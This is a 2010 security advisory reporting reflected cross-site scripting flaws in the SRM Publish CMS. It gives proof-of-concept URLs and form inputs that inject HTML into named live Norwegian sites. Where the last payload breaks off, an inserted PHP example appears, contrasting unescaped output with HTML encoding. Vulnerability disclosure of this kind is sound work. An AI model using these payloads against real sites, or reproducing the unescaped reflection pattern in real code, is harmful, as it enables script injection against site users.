------------------------------------------------------------------------
Multiple XSS vulnerabilities in SRM Publish
------------------------------------------------------------------------
Author: Audun Larsen (larsen at xqus dot com)
Date: Jan 23, 2010
--AFFECTED SOFTWARE-----------------------------------------------------
Name: SRM Publish
SRM Publish is a CMS developed and maintained by the Norwegian company
"Mathisen IT Consult AS" and is used on sites such as ung.no and
kursguiden.no.
--DISCUSSION------------------------------------------------------------
SRM Publish is vulnerable to multiple non-persistent (reflected)
Cross-Site Scripting attacks. The problem exists because user input is
not properly escaped before it is displayed back to the user.
--PROOF OF CONCEPT------------------------------------------------------
http://www.ung.no/sok.php?sok=%22%3E%3Cimg%20src=http://dl.dropbox.com/u/432933/av-14652.gif%3E%3Ca%20%22
------------------------------
http://www.ung.no/sok.php?sok=bli%20den%20du%20vil%3Cmarquee%3E
------------------------------
Enter any HTML code in the e-mail field at
http://www.kursguiden.no/kundeweb/?shw=glemtpassord
------------------------------
Enter the following in one of the text fields at
http://www.kursguiden.no/kundeweb/?shw=kontakt or
http://www.kursguiden.no/kundeweb/?shw=nybruker:
">
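The root cause named above is output without escaping. As an added example, not SRM Publish's own code (its source is not shown in this advisory), a minimal PHP search page that reflects the "sok" parameter the vulnerable way beside the hardened version that HTML-encodes it; the function names and the constructed inputs are assumptions for illustration.

```php
<?php
// Added example (not SRM Publish's code): a minimal PHP search page that
// reflects the "sok" query parameter, first the way the advisory describes
// (unescaped) and then with context-appropriate HTML encoding.

// Vulnerable pattern: the raw value lands inside an attribute and in the body,
// so a leading "> closes the attribute and <marquee> is parsed as markup.
function render_search_vulnerable(string $sok): string
{
    return '<input name="sok" value="' . $sok . '">'
         . '<p>Results for: ' . $sok . '</p>';
}

// Encode for the HTML context. ENT_QUOTES converts both ' and ", which is what
// keeps an attribute value closed; the charset must match the page's charset.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: every reflected occurrence goes through h().
function render_search_safe(string $sok): string
{
    return '<input name="sok" value="' . h($sok) . '">'
         . '<p>Results for: ' . h($sok) . '</p>';
}

// Returns true when none of the given inputs can introduce a tag or break out
// of the attribute in the hardened output. The template's own markup is
// stripped first; anything left must contain no '<', '>' or '"'.
function payloads_are_inert(array $payloads): bool
{
    $template = ['<input name="sok" value="', '"><p>Results for: ', '</p>'];
    foreach ($payloads as $p) {
        $rest = str_replace($template, '', render_search_safe($p));
        if (strpbrk($rest, '<>"') !== false) {
            return false;
        }
    }
    return true;
}

// Constructed inputs mirroring the payload shapes listed in this advisory.
$constructed = ['"><img src=x>', 'bli den du vil<marquee>', "'><a href=x>"];
var_dump(payloads_are_inert($constructed));

if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/html; charset=UTF-8');
    echo render_search_safe($_GET['sok'] ?? '');
}
```

Run it from the command line to see the self-check result, or serve it to compare the encoded output of render_search_safe() with what render_search_vulnerable() would emit for the same input.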
--TIMELINE--------------------------------------------------------------
Jan 23, 2010: Vulnerability discovered
Jan 23, 2010: srm@srm.no notified
--DISCLAIMER------------------------------------------------------------
The information in this advisory and any of its demonstrations
is provided "as is" without warranty of any kind.
Copyright © 2010 Audun Larsen, some rights reserved:
http://creativecommons.org/licenses/by-sa/3.0/